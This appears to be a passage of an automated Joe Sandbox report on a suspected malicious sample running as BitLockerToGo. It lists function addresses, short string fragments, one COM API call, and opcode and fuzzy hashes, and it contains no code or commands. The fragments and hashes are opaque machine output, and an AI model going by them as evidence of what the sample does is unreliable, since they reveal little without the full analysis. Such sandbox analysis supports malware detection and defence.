                                                                                                                  Function 00444D00 Relevance: 4.4, Strings: 3, Instructions: 649COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD$\ND$rMD
                                                                                                                  • API String ID: 0-3334719976
                                                                                                                  • Opcode ID: 02a0fbc65b2dc14c908a26694d4605c7981cf27231b4d042642b17716f938e76
                                                                                                                  • Instruction ID: 80cc7299be2c59c19d41dda01923abfb18f5406686c9f97d89f99809ec7d9800
                                                                                                                  • Opcode Fuzzy Hash: 02a0fbc65b2dc14c908a26694d4605c7981cf27231b4d042642b17716f938e76
                                                                                                                  • Instruction Fuzzy Hash: 7B122339A09215CFCB08CF68D8906AEB7E2FB89315F1A807DC94697352D738E951CF84
                                                                                                                  Function 0042BA60 Relevance: 4.1, Strings: 3, Instructions: 379COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: #$}$
                                                                                                                  • API String ID: 2994545307-279031308
                                                                                                                  • Opcode ID: 53e9d0c464230eade1511230b554878df6c08e4444f6a4d87cb48207a158c9fc
                                                                                                                  • Instruction ID: 85f339112e17bfba3d29dbdf3c8ecdd5493795f082e857ba9aee97c6139f4896
                                                                                                                  • Opcode Fuzzy Hash: 53e9d0c464230eade1511230b554878df6c08e4444f6a4d87cb48207a158c9fc
                                                                                                                  • Instruction Fuzzy Hash: 9CA19771B083208BE7109E65E8803ABB792EBD4310F98853EE9848B345E77CDD01C7CA
                                                                                                                  Function 00427064 Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: !$$$%
                                                                                                                  • API String ID: 2994545307-2423984669
                                                                                                                  • Opcode ID: e529b247a424679314715b164904a7ac2bd4d799715649e5b6893913ab53f54b
                                                                                                                  • Instruction ID: 6999cc66a73ac22c1117d89e5f2af75c30d0b8e08183c810109acb5fce373b4e
                                                                                                                  • Opcode Fuzzy Hash: e529b247a424679314715b164904a7ac2bd4d799715649e5b6893913ab53f54b
                                                                                                                  • Instruction Fuzzy Hash: 6E61F932A0C390CFD324CA28C5557ABBBE2ABD5314F19496EE9D587382D6798801CB57
                                                                                                                  Function 0042EB30 Relevance: 3.3, Strings: 2, Instructions: 751COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: B@BJ$FTGN
                                                                                                                  • API String ID: 0-2372930948
                                                                                                                  • Opcode ID: 4f52eb7d8758021b8a61d5363b63822523604c3ad14c3e7977ea426ff8c3d206
                                                                                                                  • Instruction ID: 28df23339efa2ff5e73c80c29488a74ea5d545988e4033e2cca559b8a2ca2beb
                                                                                                                  • Opcode Fuzzy Hash: 4f52eb7d8758021b8a61d5363b63822523604c3ad14c3e7977ea426ff8c3d206
                                                                                                                  • Instruction Fuzzy Hash: 4C3267B6A08350CFD310CF25E88162BBBE1BB95314F99493DF58597391D379D809CB8A
                                                                                                                  Function 0042E4B2 Relevance: 3.2, Strings: 2, Instructions: 662COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 0-1425349742
                                                                                                                  • Opcode ID: 73dd191b51941357b402aa2fff8d7b484f7a6c2a05bf00affef160a227112429
                                                                                                                  • Instruction ID: a48e7398a59a425d154b5aa87e8429b66167c511d5389ecb816c1b92b8bbf56a
                                                                                                                  • Opcode Fuzzy Hash: 73dd191b51941357b402aa2fff8d7b484f7a6c2a05bf00affef160a227112429
                                                                                                                  • Instruction Fuzzy Hash: 681258B4E00225CFCB24CF95D8916ABB7B1FF55314F5845AAE846AF352E338AC01CB94
                                                                                                                  Function 0042E108 Relevance: 3.1, Strings: 2, Instructions: 615COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 0-1425349742
                                                                                                                  • Opcode ID: 6954f0e74a105458b55d302594fc904d2380914e8ead8369d6159b6911f031fe
                                                                                                                  • Instruction ID: 8589f4b93a998868114f223be7af651f505e9e730e50a6b1ccb8af2b7f0d31d5
                                                                                                                  • Opcode Fuzzy Hash: 6954f0e74a105458b55d302594fc904d2380914e8ead8369d6159b6911f031fe
                                                                                                                  • Instruction Fuzzy Hash: 041246B5E00214CFCF14CFA9D8826AEBBB1FF55314F1841A9E845AB392D7399D01CB98
                                                                                                                  Function 00444DE0 Relevance: 3.1, Strings: 2, Instructions: 596COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD$\ND
                                                                                                                  • API String ID: 0-2093393921
                                                                                                                  • Opcode ID: adf512957d84d4cf8b8f189be333a95e9778c5d7d228dffb59c0be1092d83611
                                                                                                                  • Instruction ID: da9220c6e1174317c4111917ac9d46df9afd4fbc859c5c841897490ddf909bd5
                                                                                                                  • Opcode Fuzzy Hash: adf512957d84d4cf8b8f189be333a95e9778c5d7d228dffb59c0be1092d83611
                                                                                                                  • Instruction Fuzzy Hash: 2E022335A09215CFDB08CF28D8A06AEB7E2FF89315F1A857DD84697352D738E911CB84
                                                                                                                  Function 00423050 Relevance: 3.1, Strings: 2, Instructions: 591COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 2994545307-1425349742
                                                                                                                  • Opcode ID: bda960a75d46c5a6fc9d5fe3249d19a5ec2dd75b80d1f6525b744beddf1b34e1
                                                                                                                  • Instruction ID: c4360625503617542969dcb1a8dc174e59d305d23cbff731b3d34fafdd4a4b8f
                                                                                                                  • Opcode Fuzzy Hash: bda960a75d46c5a6fc9d5fe3249d19a5ec2dd75b80d1f6525b744beddf1b34e1
                                                                                                                  • Instruction Fuzzy Hash: E912CFB17083509BEB30CF11E841BABB7F2FBC4715F54892EE58997280D778A901CB5A
                                                                                                                  Function 00440680 Relevance: 3.1, Strings: 2, Instructions: 556COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: f$
                                                                                                                  • API String ID: 2994545307-508322865
                                                                                                                  • Opcode ID: 506eec650a7e683151291a75bace8e38032bc7d3d431c0ed8e0fdf087f8987fa
                                                                                                                  • Instruction ID: cf7913528af932525df29018c7e9a92b13501a7b8df9cc2de72caf012cab3203
                                                                                                                  • Opcode Fuzzy Hash: 506eec650a7e683151291a75bace8e38032bc7d3d431c0ed8e0fdf087f8987fa
                                                                                                                  • Instruction Fuzzy Hash: DE12D2716083019FE714CF24C890B6BBBE5EFC4324F188A2EE69587391D738E855CB96
                                                                                                                  Function 0042FB40 Relevance: 3.0, Strings: 2, Instructions: 514COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$"
                                                                                                                  • API String ID: 0-3758156766
                                                                                                                  • Opcode ID: 754eff2a203b1f2999262ef63289dc97fc84d87b7793b8ed974992b704871ebb
                                                                                                                  • Instruction ID: 027281265db9bd885d198bbd6faf2ebbc5f8f39600461de4268311c776c3208f
                                                                                                                  • Opcode Fuzzy Hash: 754eff2a203b1f2999262ef63289dc97fc84d87b7793b8ed974992b704871ebb
                                                                                                                  • Instruction Fuzzy Hash: 63F12872B043259BD724CE24D85076BB7F6AB85714F898A3FE89587381D73CDD08878A
                                                                                                                  Function 0042CE10 Relevance: 2.9, Strings: 2, Instructions: 426COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "$-
                                                                                                                  • API String ID: 0-1891628623
                                                                                                                  • Opcode ID: 9ef0e9d74da6ad656d1a223796b17ba5ee5cc0803d3cc355ef079b00ff19ef77
                                                                                                                  • Instruction ID: 409e7f0f42de908952055a9ae165f448cfce8c018921f9c463f252e9f8011cf2
                                                                                                                  • Opcode Fuzzy Hash: 9ef0e9d74da6ad656d1a223796b17ba5ee5cc0803d3cc355ef079b00ff19ef77
                                                                                                                  • Instruction Fuzzy Hash: 07E1F371B087508FD7248F38E89032AB7E3AF96320F58877EE5A5873E1D77498058B46
                                                                                                                  Function 00403660 Relevance: 2.9, Strings: 2, Instructions: 389COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Inf$NaN
                                                                                                                  • API String ID: 0-3500518849
                                                                                                                  • Opcode ID: fdb9c4f1def0b44284688850e7d7e7a85fa42450cb7cadda0af4bafbfeec21dc
                                                                                                                  • Instruction ID: c35c1e7e12b3771c910db410aac6e5eeb6539b0bf606aef8e5c6bd8fc8db494e
                                                                                                                  • Opcode Fuzzy Hash: fdb9c4f1def0b44284688850e7d7e7a85fa42450cb7cadda0af4bafbfeec21dc
                                                                                                                  • Instruction Fuzzy Hash: A8D1B5B2A183019BC704DF29C88061BBBE5EBC4750F258A3EF895A73D0E775DD058B86
                                                                                                                  Function 00443FE0 Relevance: 2.9, Strings: 2, Instructions: 354COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: p0$x
                                                                                                                  • API String ID: 0-2507914393
                                                                                                                  • Opcode ID: 630b1b5afc5f177c9431a9f5076ca5148321e1ba6648ef4f63e66009729a73fe
                                                                                                                  • Instruction ID: f6473e0c438b0c76937b8e5a4aedafa281db5fc06e111d20d1bfd7aca3b66397
                                                                                                                  • Opcode Fuzzy Hash: 630b1b5afc5f177c9431a9f5076ca5148321e1ba6648ef4f63e66009729a73fe
                                                                                                                  • Instruction Fuzzy Hash: 05A14671A083105BF310AF69DC8576BB7D9EBC5718F08863EF99487342EA78DD04878A
                                                                                                                  Function 0040D7A0 Relevance: 2.8, Strings: 2, Instructions: 311COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 2971BE6964AA73485AC05C7BE5FFBF3A$D
                                                                                                                  • API String ID: 0-4289711150
                                                                                                                  • Opcode ID: 5654aae2cd00a699ec6970eec807cb6c1d10e8086298d32956939ca547584023
                                                                                                                  • Instruction ID: 670f46167a762a40611c524bf2c349a6a5da502f4279f5c5468dde45710e4c5a
                                                                                                                  • Opcode Fuzzy Hash: 5654aae2cd00a699ec6970eec807cb6c1d10e8086298d32956939ca547584023
                                                                                                                  • Instruction Fuzzy Hash: ADB1EF746483808FD324DF65C885B6FBBE1EB92308F04892DE1D68B381D779840ACB96
                                                                                                                  Function 0043B800 Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r$x
                                                                                                                  • API String ID: 0-117603716
                                                                                                                  • Opcode ID: 88f6d0e3e4a71c5209e996d4882c6d6ce2428d8ee98983d41cb78630eef4a9f8
                                                                                                                  • Instruction ID: 2c4430a27d130f18666e07c8b7d6bf09346141856affb25cd02a3f225c88f7da
                                                                                                                  • Opcode Fuzzy Hash: 88f6d0e3e4a71c5209e996d4882c6d6ce2428d8ee98983d41cb78630eef4a9f8
                                                                                                                  • Instruction Fuzzy Hash: 3F91052261D7D14AD311853D488435BEFC28BEB234F2E9B6EE5F5877D2C668C8068397
                                                                                                                  Function 0042B030 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: D$W'Y
                                                                                                                  • API String ID: 0-1118136004
                                                                                                                  • Opcode ID: 10f5109e240d04b7d956005997c127e2863bc4825cc5305122a6589d7f83d0e1
                                                                                                                  • Instruction ID: f68c4455cee8dc2bbb60a2bbd182a8c4b79648440d0fc381fb5ee526daec201d
                                                                                                                  • Opcode Fuzzy Hash: 10f5109e240d04b7d956005997c127e2863bc4825cc5305122a6589d7f83d0e1
                                                                                                                  • Instruction Fuzzy Hash: 155133B06183548BD7119F24E89676BBBF0FF92354F048A1EE4D24B391E3398905CB9B
                                                                                                                  Function 00426040 Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 2aB$tw
                                                                                                                  • API String ID: 0-3611918111
                                                                                                                  • Opcode ID: beda1f8c36f9de99f509ea92a0c663d63e0946aa0ef001c5624ad58b7e78840a
                                                                                                                  • Instruction ID: d9a3f6c3f4004856945dedf7fce316257e12c42ee60794a02e20acfda04b474f
                                                                                                                  • Opcode Fuzzy Hash: beda1f8c36f9de99f509ea92a0c663d63e0946aa0ef001c5624ad58b7e78840a
                                                                                                                  • Instruction Fuzzy Hash: 0621F9B16042608BCB10EF29D85153BB7F5EF96364F568A1DE486DB391E3388D00C7A6
                                                                                                                  Function 00404D10 Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: %1.17g
                                                                                                                  • API String ID: 0-1551345525
                                                                                                                  • Opcode ID: 8235591dee3f345f481006b61f640f0df1fe9f1d85d6e87e6014fd1bc5843c71
                                                                                                                  • Instruction ID: bc4aa90b4d418dabbab0c788fddc1a4b48de251270a44bfbbe5fbcdbb17fc428
                                                                                                                  • Opcode Fuzzy Hash: 8235591dee3f345f481006b61f640f0df1fe9f1d85d6e87e6014fd1bc5843c71
                                                                                                                  • Instruction Fuzzy Hash: 6012D4B1A04B428BE7158E58C48032BB7D2EFE1348F19857ED945AB3D1E7B9DC05CB86
                                                                                                                  Function 00444EB0 Relevance: 1.8, Strings: 1, Instructions: 556COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD
                                                                                                                  • API String ID: 0-1035268547
                                                                                                                  • Opcode ID: 9b4192cd08c4c34dfe4c0b7eae8521623209a574d085f0829867724dc409debb
                                                                                                                  • Instruction ID: 4d094fb495468e48a3addeb7872ab3b2f91aeae73f74a3b054ea59c7aaa6eb5a
                                                                                                                  • Opcode Fuzzy Hash: 9b4192cd08c4c34dfe4c0b7eae8521623209a574d085f0829867724dc409debb
                                                                                                                  • Instruction Fuzzy Hash: 38023435A18215CFDB08CF78D8A06AE77B2FB89315F1A817ED84697392D738D941CB84
                                                                                                                  Function 0042C000 Relevance: 1.8, Strings: 1, Instructions: 549COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PS
                                                                                                                  • API String ID: 0-151015397
                                                                                                                  • Opcode ID: c3c614a19592cb3100c52353f5665adac3e6bedfa0dc8e058778e0e5e9fa94eb
                                                                                                                  • Instruction ID: a141a6e8e6c7590258cd1c07ab7120b967fd28593ea306627081e45c2b94ef90
                                                                                                                  • Opcode Fuzzy Hash: c3c614a19592cb3100c52353f5665adac3e6bedfa0dc8e058778e0e5e9fa94eb
                                                                                                                  • Instruction Fuzzy Hash: 04F123B1A08351CFD704CF24E89166FB7E1EF86304F58896EE4859B382D778D906CB5A
                                                                                                                  Function 00427560 Relevance: 1.7, APIs: 1, Instructions: 238comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(00448B80,00000000,00000001,00448B70), ref: 00427589
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInstance
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 542301482-0
                                                                                                                  • Opcode ID: fafac9fc921528d8647f2efcde00f748e332d891c19162ff4af9c2ba83ae19e6
                                                                                                                  • Instruction ID: 7f7ca502a01f9f439c977ffca4cade7dff2eea6e07552d72b28b3f3531552ca9
                                                                                                                  • Opcode Fuzzy Hash: fafac9fc921528d8647f2efcde00f748e332d891c19162ff4af9c2ba83ae19e6
                                                                                                                  • Instruction Fuzzy Hash: 2861F0B03082149BDB209F28DC96F6733A4FF81368F144529F9468B391F779E801C76A
                                                                                                                  Function 004444A0 Relevance: 1.7, Strings: 1, Instructions: 469COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: P
                                                                                                                  • API String ID: 0-3110715001
                                                                                                                  • Opcode ID: ae7d9793624f2912098290f9648a607166ac23ae6a2369eaaee9330ca6d6e4de
                                                                                                                  • Instruction ID: 3d0711d0d2bfc3dd26366644bf9da979a3c5ddd08c0172617819e1e159f04e5d
                                                                                                                  • Opcode Fuzzy Hash: ae7d9793624f2912098290f9648a607166ac23ae6a2369eaaee9330ca6d6e4de
                                                                                                                  • Instruction Fuzzy Hash: CFE148326083A54FD716CE28989072FB6D1ABC1314F19827EE8A55B3D2CB79CC4687C5
                                                                                                                  Function 00423930 Relevance: 1.7, Strings: 1, Instructions: 461COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: IBEr
                                                                                                                  • API String ID: 0-2269330005
                                                                                                                  • Opcode ID: ae0bd5367e85eb07c3c757255d54ebc4f2a1e7bc33c308c5deb61004c9bfa0ab
                                                                                                                  • Instruction ID: 5ff3b642728f2906d08fd8ab5495327e0e8e317e4dca163dd7439ed3f2441d47
                                                                                                                  • Opcode Fuzzy Hash: ae0bd5367e85eb07c3c757255d54ebc4f2a1e7bc33c308c5deb61004c9bfa0ab
                                                                                                                  • Instruction Fuzzy Hash: 5AD11371608350ABE3109E26EC82B6BBBE5EBD1314F04492EF8C557382E67DD9058B5B
                                                                                                                  Function 0041243E Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID: .(A
                                                                                                                  • API String ID: 2994545307-2434035028
                                                                                                                  • Opcode ID: 8d9973cec5c24d73cbb3a3cbf466478a74e0abc0e058f32a1d14b576688fcb0b
                                                                                                                  • Instruction ID: 75ded15fcc90b77bc0ff3910cc8a7d0cec17a87f4e65669c52cdb57423ba1d5a
                                                                                                                  • Opcode Fuzzy Hash: 8d9973cec5c24d73cbb3a3cbf466478a74e0abc0e058f32a1d14b576688fcb0b
                                                                                                                  • Instruction Fuzzy Hash: 4BC1C372711A018FD729CF79CDC1663B7E2FB983113188A2EE096C7795DB78E9518B04
                                                                                                                  Function 004433BA Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r9D
                                                                                                                  • API String ID: 0-3607194911
                                                                                                                  • Opcode ID: e47bcf3a1ad16c6ef1e320764c240c95f83fbe8676cee162badc2b8161046caf
                                                                                                                  • Instruction ID: 77d9c4de5f4646fc71325a511dc403c8ab018c62299837183ae33f07b0be77aa
                                                                                                                  • Opcode Fuzzy Hash: e47bcf3a1ad16c6ef1e320764c240c95f83fbe8676cee162badc2b8161046caf
                                                                                                                  • Instruction Fuzzy Hash: 0AE12A3560D352CFC718CF38D8A025AB7E2BB89316F19867EC891873A2D735E945CB45
                                                                                                                  Function 00445190 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: "RD
                                                                                                                  • API String ID: 0-1035268547
                                                                                                                  • Opcode ID: 2bc4629578e23fc43e9722b41bbae388695509080c5482e9c4224711d340c2c6
                                                                                                                  • Instruction ID: 7f233f8de230bd9ad2b5a33dc94c236bb1a8a9940300b8df0755ece6398c1154
                                                                                                                  • Opcode Fuzzy Hash: 2bc4629578e23fc43e9722b41bbae388695509080c5482e9c4224711d340c2c6
                                                                                                                  • Instruction Fuzzy Hash: 62A11235619305CFDB08CF28D8902AE77E2FB8A315F19857DD88A8B392D738D951CB84
                                                                                                                  Function 0044392C Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
